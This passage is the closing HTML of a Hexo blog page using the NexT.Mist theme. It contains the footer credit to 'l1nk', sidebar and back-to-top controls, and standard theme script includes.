    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">l1nk</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
